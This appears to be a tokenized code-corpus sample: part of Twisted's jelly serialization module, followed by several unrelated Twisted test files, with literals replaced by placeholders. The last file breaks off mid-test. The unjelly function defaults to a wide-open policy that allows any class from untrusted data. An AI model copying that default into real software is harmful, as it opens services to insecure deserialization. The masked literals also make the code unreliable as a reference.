        sign, guts, exponent = d.as_tuple()
        value = reduce(lambda left, right: left * <NUM_LIT:10> + right, guts)
        if sign:
            value = -value
        return ['<STR_LIT>', value, exponent]

    def unpersistable(self, reason, sxp=None):
        """
        Emit (or append to C{sxp}) an unpersistable marker carrying
        C{reason}.
        """
        if sxp is None:
            sxp = []
        sxp.append(unpersistable_atom)
        sxp.append(reason)
        return sxp


class _Unjellier:
    # Deserializer: walks jelly s-expressions back into live objects,
    # resolving forward/cyclic references and enforcing the taster policy.

    def __init__(self, taster, persistentLoad, invoker):
        self.taster = taster
        self.persistentLoad = persistentLoad
        # refid -> resolved object (or NotKnown placeholder).
        self.references = {}
        # postUnjelly callbacks to run once the whole graph is rebuilt.
        self.postCallbacks = []
        self.invoker = invoker

    def unjellyFull(self, obj):
        # Unjelly, then fire all queued postUnjelly callbacks.
        o = self.unjelly(obj)
        for m in self.postCallbacks:
            m()
        return o

    def unjelly(self, obj):
        # Non-list expressions are literals and pass through untouched.
        if type(obj) is not types.ListType:
            return obj
        jelType = obj[<NUM_LIT:0>]
        if not self.taster.isTypeAllowed(jelType):
            raise InsecureJelly(jelType)
        # 1) Explicitly registered unjellyable class/callable.
        regClass = unjellyableRegistry.get(jelType)
        if regClass is not None:
            if isinstance(regClass, ClassType):
                # Old-style class: graft onto a dummy shell to skip __init__.
                inst = _Dummy()
                inst.__class__ = regClass
                method = inst.unjellyFor
            elif isinstance(regClass, type):
                inst = regClass.__new__(regClass)
                method = inst.unjellyFor
            else:
                method = regClass
            val = method(self, obj)
            if hasattr(val, '<STR_LIT>'):
                self.postCallbacks.append(inst.postUnjelly)
            return val
        # 2) Registered factory taking the unjellied state.
        regFactory = unjellyableFactoryRegistry.get(jelType)
        if regFactory is not None:
            state = self.unjelly(obj[<NUM_LIT:1>])
            inst = regFactory(state)
            if hasattr(inst, '<STR_LIT>'):
                self.postCallbacks.append(inst.postUnjelly)
            return inst
        # 3) Built-in _unjelly_<type> thunk.
        thunk = getattr(self, '<STR_LIT>' % jelType, None)
        if thunk is not None:
            ret = thunk(obj[<NUM_LIT:1>:])
        else:
            # 4) Fully-qualified class name: vet module and class against
            # the taster before instantiating.
            nameSplit = jelType.split('<STR_LIT:.>')
            modName = '<STR_LIT:.>'.join(nameSplit[:-<NUM_LIT:1>])
            if not self.taster.isModuleAllowed(modName):
                raise InsecureJelly(
                    "<STR_LIT>" % (modName, jelType))
            clz = namedObject(jelType)
            if not self.taster.isClassAllowed(clz):
                raise InsecureJelly("<STR_LIT>" % jelType)
            if hasattr(clz, "<STR_LIT>"):
                ret = _newInstance(clz)
                state = self.unjelly(obj[<NUM_LIT:1>])
                ret.__setstate__(state)
            else:
                state = self.unjelly(obj[<NUM_LIT:1>])
                ret = _newInstance(clz, state)
            if hasattr(clz, '<STR_LIT>'):
                self.postCallbacks.append(ret.postUnjelly)
        return ret

    def _unjelly_None(self, exp):
        return None

    def _unjelly_unicode(self, exp):
        if UnicodeType:
            return unicode(exp[<NUM_LIT:0>], "<STR_LIT>")
        else:
            return Unpersistable("<STR_LIT>" % (exp[<NUM_LIT:0>],))

    def _unjelly_decimal(self, exp):
        """
        Rebuild a Decimal from the (value, exponent) pair produced by
        jelly_decimal(); degrades to Unpersistable when the decimal
        module is unavailable.
        """
        if decimal is None:
            return Unpersistable(
                "<STR_LIT>" % (exp[<NUM_LIT:0>] * (<NUM_LIT:10> ** exp[<NUM_LIT:1>]),))
        value = exp[<NUM_LIT:0>]
        exponent = exp[<NUM_LIT:1>]
        if value < <NUM_LIT:0>:
            sign = <NUM_LIT:1>
        else:
            sign = <NUM_LIT:0>
        guts = decimal.Decimal(value).as_tuple()[<NUM_LIT:1>]
        return decimal.Decimal((sign, guts, exponent))

    def _unjelly_boolean(self, exp):
        if BooleanType:
            assert exp[<NUM_LIT:0>] in ('<STR_LIT:true>', '<STR_LIT:false>')
            return exp[<NUM_LIT:0>] == '<STR_LIT:true>'
        else:
            return Unpersistable("<STR_LIT>" % (exp[<NUM_LIT:0>],))

    def _unjelly_datetime(self, exp):
        return datetime.datetime(*map(int, exp[<NUM_LIT:0>].split()))

    def _unjelly_date(self, exp):
        return datetime.date(*map(int, exp[<NUM_LIT:0>].split()))

    def _unjelly_time(self, exp):
        return datetime.time(*map(int, exp[<NUM_LIT:0>].split()))

    def _unjelly_timedelta(self, exp):
        days, seconds, microseconds = map(int, exp[<NUM_LIT:0>].split())
        return datetime.timedelta(
            days=days, seconds=seconds, microseconds=microseconds)

    def unjellyInto(self, obj, loc, jel):
        """
        Unjelly C{jel} into C{obj[loc]}; if the result is a NotKnown
        placeholder, register the slot so it gets patched on resolution.
        """
        o = self.unjelly(jel)
        if isinstance(o, NotKnown):
            o.addDependant(obj, loc)
        obj[loc] = o
        return o

    def _unjelly_dereference(self, lst):
        refid = lst[<NUM_LIT:0>]
        x = self.references.get(refid)
        if x is not None:
            return x
        # Forward reference: hand back a placeholder to fill in later.
        der = _Dereference(refid)
        self.references[refid] = der
        return der

    def _unjelly_reference(self, lst):
        refid = lst[<NUM_LIT:0>]
        exp = lst[<NUM_LIT:1>]
        o = self.unjelly(exp)
        ref = self.references.get(refid)
        if (ref is None):
            self.references[refid] = o
        elif isinstance(ref, NotKnown):
            # A dereference got here first; resolve its dependants now.
            ref.resolveDependants(o)
            self.references[refid] = o
        else:
            assert <NUM_LIT:0>, "<STR_LIT>"
        return o

    def _unjelly_tuple(self, lst):
        l = range(len(lst))
        finished = <NUM_LIT:1>
        for elem in l:
            if isinstance(self.unjellyInto(l, elem, lst[elem]), NotKnown):
                finished = <NUM_LIT:0>
        if finished:
            return tuple(l)
        else:
            # Unresolved members: return a stand-in that becomes a tuple
            # once everything resolves.
            return _Tuple(l)

    def _unjelly_list(self, lst):
        l = range(len(lst))
        for elem in l:
            self.unjellyInto(l, elem, lst[elem])
        return l

    def _unjellySetOrFrozenset(self, lst, containerType):
        """
        Unjelly C{lst} into a C{containerType}; if any member is still a
        NotKnown placeholder, return a _Container stand-in instead.
        """
        l = range(len(lst))
        finished = True
        for elem in l:
            data = self.unjellyInto(l, elem, lst[elem])
            if isinstance(data, NotKnown):
                finished = False
        if not finished:
            return _Container(l, containerType)
        else:
            return containerType(l)

    def _unjelly_set(self, lst):
        """
        Unjelly a set, using the built-in type when available and the
        legacy sets module otherwise.
        """
        if _set is not None:
            containerType = set
        else:
            containerType = _sets.Set
        return self._unjellySetOrFrozenset(lst, containerType)

    def _unjelly_frozenset(self, lst):
        """
        Unjelly a frozenset, with the same built-in/legacy fallback as
        _unjelly_set.
        """
        if _set is not None:
            containerType = frozenset
        else:
            containerType = _sets.ImmutableSet
        return self._unjellySetOrFrozenset(lst, containerType)

    def _unjelly_dictionary(self, lst):
        d = {}
        for k, v in lst:
            # _DictKeyAndValue inserts into d once both halves resolve.
            kvd = _DictKeyAndValue(d)
            self.unjellyInto(kvd, <NUM_LIT:0>, k)
            self.unjellyInto(kvd, <NUM_LIT:1>, v)
        return d

    def _unjelly_module(self, rest):
        moduleName = rest[<NUM_LIT:0>]
        if type(moduleName) != types.StringType:
            raise InsecureJelly(
                "<STR_LIT>")
        if not self.taster.isModuleAllowed(moduleName):
            raise InsecureJelly(
                "<STR_LIT>" % (moduleName,))
        mod = __import__(moduleName, {}, {}, "<STR_LIT:x>")
        return mod

    def _unjelly_class(self, rest):
        clist = rest[<NUM_LIT:0>].split('<STR_LIT:.>')
        modName = '<STR_LIT:.>'.join(clist[:-<NUM_LIT:1>])
        if not self.taster.isModuleAllowed(modName):
            raise InsecureJelly("<STR_LIT>" % modName)
        klaus = namedObject(rest[<NUM_LIT:0>])
        objType = type(klaus)
        # Must resolve to an actual (old- or new-style) class object.
        if objType not in (types.ClassType, types.TypeType):
            raise InsecureJelly(
                "<STR_LIT>" % (
                    rest[<NUM_LIT:0>], klaus))
        if not self.taster.isClassAllowed(klaus):
            raise InsecureJelly("<STR_LIT>" % qual(klaus))
        return klaus

    def _unjelly_function(self, rest):
        modSplit = rest[<NUM_LIT:0>].split('<STR_LIT:.>')
        modName = '<STR_LIT:.>'.join(modSplit[:-<NUM_LIT:1>])
        if not self.taster.isModuleAllowed(modName):
            raise InsecureJelly("<STR_LIT>" % modName)
        function = namedObject(rest[<NUM_LIT:0>])
        return function

    def _unjelly_persistent(self, rest):
        if self.persistentLoad:
            pload = self.persistentLoad(rest[<NUM_LIT:0>], self)
            return pload
        else:
            return Unpersistable("<STR_LIT>")

    def _unjelly_instance(self, rest):
        clz = self.unjelly(rest[<NUM_LIT:0>])
        if type(clz) is not types.ClassType:
            raise InsecureJelly("<STR_LIT>")
        if hasattr(clz, "<STR_LIT>"):
            inst = _newInstance(clz, {})
            state = self.unjelly(rest[<NUM_LIT:1>])
            inst.__setstate__(state)
        else:
            state = self.unjelly(rest[<NUM_LIT:1>])
            inst = _newInstance(clz, state)
        if hasattr(clz, '<STR_LIT>'):
            self.postCallbacks.append(inst.postUnjelly)
        return inst

    def _unjelly_unpersistable(self, rest):
        return Unpersistable("<STR_LIT>" % (rest[<NUM_LIT:0>],))

    def _unjelly_method(self, rest):
        """
        Rebuild a bound method from (name, self, class), tolerating a
        not-yet-resolved C{im_self} via _InstanceMethod.
        """
        im_name = rest[<NUM_LIT:0>]
        im_self = self.unjelly(rest[<NUM_LIT:1>])
        im_class = self.unjelly(rest[<NUM_LIT:2>])
        if type(im_class) is not types.ClassType:
            raise InsecureJelly("<STR_LIT>")
        if im_name in im_class.__dict__:
            if im_self is None:
                im = getattr(im_class, im_name)
            elif isinstance(im_self, NotKnown):
                im = _InstanceMethod(im_name, im_self, im_class)
            else:
                im = MethodType(im_class.__dict__[im_name], im_self, im_class)
        else:
            raise TypeError('<STR_LIT>')
        return im


class _Dummy:
    """
    Empty old-style class used as a shell to receive an arbitrary
    __class__ during unjellying.
    """


class _DummyNewStyle(object):
    """
    New-style counterpart of _Dummy.
    """


def _newDummyLike(instance):
    """
    Create an uninitialized object sharing C{instance}'s class and
    __dict__, choosing the old/new-style dummy shell as appropriate.
    """
    if isinstance(instance.__class__, type):
        dummy = _DummyNewStyle()
    else:
        dummy = _Dummy()
    dummy.__class__ = instance.__class__
    dummy.__dict__ = instance.__dict__
    return dummy


class InsecureJelly(Exception):
    """
    Raised when an expression violates the active security policy.
    """


class DummySecurityOptions:
    """
    Wide-open policy: allows every module, class and type.
    """

    def isModuleAllowed(self, moduleName):
        """
        Always allow.
        """
        return <NUM_LIT:1>

    def isClassAllowed(self, klass):
        """
        Always allow.
        """
        return <NUM_LIT:1>

    def isTypeAllowed(self, typeName):
        """
        Always allow.
        """
        return <NUM_LIT:1>


class SecurityOptions:
    """
    Whitelist-based policy controlling which modules, classes and jelly
    type atoms may be (de)serialized.
    """
    basicTypes = ["<STR_LIT>", "<STR_LIT:list>", "<STR_LIT>",
                  "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
                  "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"]

    def __init__(self):
        """
        Start with only primitive leaf types allowed; everything else
        must be whitelisted explicitly.
        """
        self.allowedTypes = {"<STR_LIT:None>": <NUM_LIT:1>,
                             "<STR_LIT:bool>": <NUM_LIT:1>,
                             "<STR_LIT>": <NUM_LIT:1>,
                             "<STR_LIT:string>": <NUM_LIT:1>,
                             "<STR_LIT:str>": <NUM_LIT:1>,
                             "<STR_LIT:int>": <NUM_LIT:1>,
                             "<STR_LIT:float>": <NUM_LIT:1>,
                             "<STR_LIT>": <NUM_LIT:1>,
                             "<STR_LIT:time>": <NUM_LIT:1>,
                             "<STR_LIT:date>": <NUM_LIT:1>,
                             "<STR_LIT>": <NUM_LIT:1>,
                             "<STR_LIT>": <NUM_LIT:1>}
        if hasattr(types, '<STR_LIT>'):
            self.allowedTypes['<STR_LIT>'] = <NUM_LIT:1>
        if decimal is not None:
            self.allowedTypes['<STR_LIT>'] = <NUM_LIT:1>
        self.allowedTypes['<STR_LIT>'] = <NUM_LIT:1>
        self.allowedTypes['<STR_LIT>'] = <NUM_LIT:1>
        self.allowedModules = {}
        self.allowedClasses = {}

    def allowBasicTypes(self):
        """
        Allow all of basicTypes (containers and common compound atoms).
        """
        self.allowTypes(*self.basicTypes)

    def allowTypes(self, *types):
        """
        Allow the named jelly type atoms; non-string arguments are
        converted via qual().  (NOTE: parameter shadows the types module
        within this method.)
        """
        for typ in types:
            if not isinstance(typ, str):
                typ = qual(typ)
            self.allowedTypes[typ] = <NUM_LIT:1>

    def allowInstancesOf(self, *classes):
        """
        Allow instances of the given classes, plus the basic types and
        instance machinery they require; their modules are allowed too.
        """
        self.allowBasicTypes()
        self.allowTypes("<STR_LIT>", "<STR_LIT:class>", "<STR_LIT>", "<STR_LIT>")
        for klass in classes:
            self.allowTypes(qual(klass))
            self.allowModules(klass.__module__)
            self.allowedClasses[klass] = <NUM_LIT:1>

    def allowModules(self, *modules):
        """
        Allow the given modules (objects or dotted names).
        """
        for module in modules:
            if type(module) == types.ModuleType:
                module = module.__name__
            self.allowedModules[module] = <NUM_LIT:1>

    def isModuleAllowed(self, moduleName):
        """
        True if C{moduleName} has been whitelisted.
        """
        return moduleName in self.allowedModules

    def isClassAllowed(self, klass):
        """
        True if C{klass} itself (not its subclasses) was whitelisted.
        """
        return klass in self.allowedClasses

    def isTypeAllowed(self, typeName):
        """
        True if the atom is whitelisted or is a dotted (qualified) name.
        """
        return (typeName in self.allowedTypes or '<STR_LIT:.>' in typeName)


globalSecurity = SecurityOptions()
globalSecurity.allowBasicTypes()


def jelly(object, taster=DummySecurityOptions(), persistentStore=None,
          invoker=None):
    """
    Serialize C{object} to a jelly s-expression under C{taster}'s policy.
    """
    return _Jellier(taster, persistentStore, invoker).jelly(object)


def unjelly(sexp, taster=DummySecurityOptions(), persistentLoad=None,
            invoker=None):
    """
    Rebuild an object graph from C{sexp}, running post-unjelly hooks.
    """
    return _Unjellier(taster, persistentLoad, invoker).unjellyFull(sexp)
<s> """<STR_LIT>""" <EOL> import sys , _preamble <EOL> from twisted . python import log , reflect <EOL> from twisted . internet import stdio , protocol <EOL> from twisted . protocols import basic <EOL> def failed ( err ) : <EOL> log . startLogging ( sys . stderr ) <EOL> log . err ( err ) <EOL> class ConsumerChild ( protocol . Protocol ) : <EOL> def __init__ ( self , junkPath ) : <EOL> self . junkPath = junkPath <EOL> def connectionMade ( self ) : <EOL> d = basic . FileSender ( ) . beginFileTransfer ( file ( self . junkPath ) , self . transport ) <EOL> d . addErrback ( failed ) <EOL> d . addCallback ( lambda ign : self . transport . loseConnection ( ) ) <EOL> def connectionLost ( self , reason ) : <EOL> reactor . stop ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> reflect . namedAny ( sys . argv [ <NUM_LIT:1> ] ) . install ( ) <EOL> from twisted . internet import reactor <EOL> stdio . StandardIO ( ConsumerChild ( sys . argv [ <NUM_LIT:2> ] ) ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> from twisted . protocols import finger <EOL> from twisted . test . proto_helpers import StringTransport <EOL> class FingerTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . transport = StringTransport ( ) <EOL> self . protocol = finger . Finger ( ) <EOL> self . protocol . makeConnection ( self . transport ) <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_simpleW ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_forwarding ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT:\r\n>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import Interface , implements , implementedBy <EOL> from StringIO import StringIO <EOL> from twisted . trial import unittest <EOL> from twisted . test . proto_helpers import StringTransport <EOL> from twisted . test . proto_helpers import StringTransportWithDisconnection <EOL> from twisted . internet import protocol , reactor , address , defer , task <EOL> from twisted . protocols import policies <EOL> class SimpleProtocol ( protocol . Protocol ) : <EOL> connected = disconnected = <NUM_LIT:0> <EOL> buffer = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . dConnected = defer . Deferred ( ) <EOL> self . dDisconnected = defer . Deferred ( ) <EOL> def connectionMade ( self ) : <EOL> self . connected = <NUM_LIT:1> <EOL> self . dConnected . callback ( '<STR_LIT>' ) <EOL> def connectionLost ( self , reason ) : <EOL> self . disconnected = <NUM_LIT:1> <EOL> self . dDisconnected . callback ( '<STR_LIT>' ) <EOL> def dataReceived ( self , data ) : <EOL> self . buffer += data <EOL> class SillyFactory ( protocol . ClientFactory ) : <EOL> def __init__ ( self , p ) : <EOL> self . p = p <EOL> def buildProtocol ( self , addr ) : <EOL> return self . p <EOL> class EchoProtocol ( protocol . Protocol ) : <EOL> paused = False <EOL> def pauseProducing ( self ) : <EOL> self . paused = True <EOL> def resumeProducing ( self ) : <EOL> self . paused = False <EOL> def stopProducing ( self ) : <EOL> pass <EOL> def dataReceived ( self , data ) : <EOL> self . transport . write ( data ) <EOL> class Server ( protocol . ServerFactory ) : <EOL> """<STR_LIT>""" <EOL> protocol = EchoProtocol <EOL> class TestableThrottlingFactory ( policies . ThrottlingFactory ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , clock , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> policies . ThrottlingFactory . __init__ ( self , * args , ** kwargs ) <EOL> self . 
clock = clock <EOL> def callLater ( self , period , func ) : <EOL> """<STR_LIT>""" <EOL> return self . clock . callLater ( period , func ) <EOL> class TestableTimeoutFactory ( policies . TimeoutFactory ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , clock , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> policies . TimeoutFactory . __init__ ( self , * args , ** kwargs ) <EOL> self . clock = clock <EOL> def callLater ( self , period , func ) : <EOL> """<STR_LIT>""" <EOL> return self . clock . callLater ( period , func ) <EOL> class WrapperTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_protocolFactoryAttribute ( self ) : <EOL> """<STR_LIT>""" <EOL> f = Server ( ) <EOL> wf = policies . WrappingFactory ( f ) <EOL> p = wf . buildProtocol ( address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertIdentical ( p . wrappedProtocol . factory , f ) <EOL> def test_transportInterfaces ( self ) : <EOL> """<STR_LIT>""" <EOL> class IStubTransport ( Interface ) : <EOL> pass <EOL> class StubTransport : <EOL> implements ( IStubTransport ) <EOL> implementedBy ( policies . ProtocolWrapper ) <EOL> proto = protocol . Protocol ( ) <EOL> wrapper = policies . ProtocolWrapper ( policies . WrappingFactory ( None ) , proto ) <EOL> wrapper . makeConnection ( StubTransport ( ) ) <EOL> self . assertTrue ( IStubTransport . providedBy ( proto . transport ) ) <EOL> def test_factoryLogPrefix ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> factory = policies . WrappingFactory ( server ) <EOL> self . assertEqual ( "<STR_LIT>" , factory . logPrefix ( ) ) <EOL> def test_factoryLogPrefixFallback ( self ) : <EOL> """<STR_LIT>""" <EOL> class NoFactory ( object ) : <EOL> pass <EOL> server = NoFactory ( ) <EOL> factory = policies . WrappingFactory ( server ) <EOL> self . assertEqual ( "<STR_LIT>" , factory . 
logPrefix ( ) ) <EOL> def test_protocolLogPrefix ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> factory = policies . WrappingFactory ( server ) <EOL> protocol = factory . buildProtocol ( <EOL> address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( "<STR_LIT>" , <EOL> protocol . logPrefix ( ) ) <EOL> def test_protocolLogPrefixFallback ( self ) : <EOL> """<STR_LIT>""" <EOL> class NoProtocol ( object ) : <EOL> pass <EOL> server = Server ( ) <EOL> server . protocol = NoProtocol <EOL> factory = policies . WrappingFactory ( server ) <EOL> protocol = factory . buildProtocol ( <EOL> address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( "<STR_LIT>" , <EOL> protocol . logPrefix ( ) ) <EOL> class WrappingFactory ( policies . WrappingFactory ) : <EOL> protocol = lambda s , f , p : p <EOL> def startFactory ( self ) : <EOL> policies . WrappingFactory . startFactory ( self ) <EOL> self . deferred . callback ( None ) <EOL> class ThrottlingTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> c1 , c2 , c3 , c4 = [ SimpleProtocol ( ) for i in range ( <NUM_LIT:4> ) ] <EOL> tServer = policies . ThrottlingFactory ( server , <NUM_LIT:2> ) <EOL> wrapTServer = WrappingFactory ( tServer ) <EOL> wrapTServer . deferred = defer . Deferred ( ) <EOL> p = reactor . listenTCP ( <NUM_LIT:0> , wrapTServer , interface = "<STR_LIT:127.0.0.1>" ) <EOL> n = p . getHost ( ) . port <EOL> def _connect123 ( results ) : <EOL> reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c1 ) ) <EOL> c1 . dConnected . addCallback ( <EOL> lambda r : reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c2 ) ) ) <EOL> c2 . dConnected . addCallback ( <EOL> lambda r : reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c3 ) ) ) <EOL> return c3 . 
dDisconnected <EOL> def _check123 ( results ) : <EOL> self . assertEqual ( [ c . connected for c in c1 , c2 , c3 ] , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> self . assertEqual ( [ c . disconnected for c in c1 , c2 , c3 ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . assertEqual ( len ( tServer . protocols . keys ( ) ) , <NUM_LIT:2> ) <EOL> return results <EOL> def _lose1 ( results ) : <EOL> c1 . transport . loseConnection ( ) <EOL> return c1 . dDisconnected <EOL> def _connect4 ( results ) : <EOL> reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c4 ) ) <EOL> return c4 . dConnected <EOL> def _check4 ( results ) : <EOL> self . assertEqual ( c4 . connected , <NUM_LIT:1> ) <EOL> self . assertEqual ( c4 . disconnected , <NUM_LIT:0> ) <EOL> return results <EOL> def _cleanup ( results ) : <EOL> for c in c2 , c4 : <EOL> c . transport . loseConnection ( ) <EOL> return defer . DeferredList ( [ <EOL> defer . maybeDeferred ( p . stopListening ) , <EOL> c2 . dDisconnected , <EOL> c4 . dDisconnected ] ) <EOL> wrapTServer . deferred . addCallback ( _connect123 ) <EOL> wrapTServer . deferred . addCallback ( _check123 ) <EOL> wrapTServer . deferred . addCallback ( _lose1 ) <EOL> wrapTServer . deferred . addCallback ( _connect4 ) <EOL> wrapTServer . deferred . addCallback ( _check4 ) <EOL> wrapTServer . deferred . addCallback ( _cleanup ) <EOL> return wrapTServer . deferred <EOL> def test_writeLimit ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> tServer = TestableThrottlingFactory ( task . Clock ( ) , server , writeLimit = <NUM_LIT:10> ) <EOL> port = tServer . buildProtocol ( address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> tr = StringTransportWithDisconnection ( ) <EOL> tr . protocol = port <EOL> port . makeConnection ( tr ) <EOL> port . producer = port . wrappedProtocol <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( tr . 
value ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( tServer . writtenThisSecond , <NUM_LIT:20> ) <EOL> self . assertFalse ( port . wrappedProtocol . paused ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . writtenThisSecond , <NUM_LIT:0> ) <EOL> self . assertTrue ( port . wrappedProtocol . paused ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . writtenThisSecond , <NUM_LIT:0> ) <EOL> self . assertFalse ( port . wrappedProtocol . paused ) <EOL> def test_readLimit ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> tServer = TestableThrottlingFactory ( task . Clock ( ) , server , readLimit = <NUM_LIT:10> ) <EOL> port = tServer . buildProtocol ( address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> tr = StringTransportWithDisconnection ( ) <EOL> tr . protocol = port <EOL> port . makeConnection ( tr ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( tr . value ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:20> ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> tr . clear ( ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( tr . value ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:20> ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . 
readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> class TimeoutTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock = task . Clock ( ) <EOL> wrappedFactory = protocol . ServerFactory ( ) <EOL> wrappedFactory . protocol = SimpleProtocol <EOL> self . factory = TestableTimeoutFactory ( self . clock , wrappedFactory , <NUM_LIT:3> ) <EOL> self . proto = self . factory . buildProtocol ( <EOL> address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . transport = StringTransportWithDisconnection ( ) <EOL> self . transport . protocol = self . proto <EOL> self . proto . makeConnection ( self . transport ) <EOL> def test_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT> ] ) <EOL> self . failUnless ( self . proto . wrappedProtocol . disconnected ) <EOL> def test_sendAvoidsTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . proto . write ( '<STR_LIT>' ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . proto . writeSequence ( [ '<STR_LIT>' ] * <NUM_LIT:3> ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT> ] ) <EOL> self . failUnless ( self . proto . wrappedProtocol . disconnected ) <EOL> def test_receiveAvoidsTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock . 
